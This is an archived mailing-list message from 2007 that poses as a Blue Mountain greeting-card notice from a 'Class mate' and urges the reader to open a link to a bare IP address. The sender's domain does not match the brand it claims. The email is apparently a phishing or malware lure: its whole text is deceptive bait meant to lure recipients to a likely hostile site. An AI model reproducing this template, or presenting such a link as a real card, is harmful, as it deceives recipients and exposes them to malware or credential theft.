axis-c-user mailing list archives

From "bluemountain.com" <o...@tradinglab.com>
Subject You've received a greeting ecard from a Class mate!
Date Sat, 07 Jul 2007 18:02:31 GMT
Hi. Class mate has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://69.153.48.144/?3e5bea6509ee64d82c3a9ebeed

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

PRIVACY
bluemountain.com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Webmaster,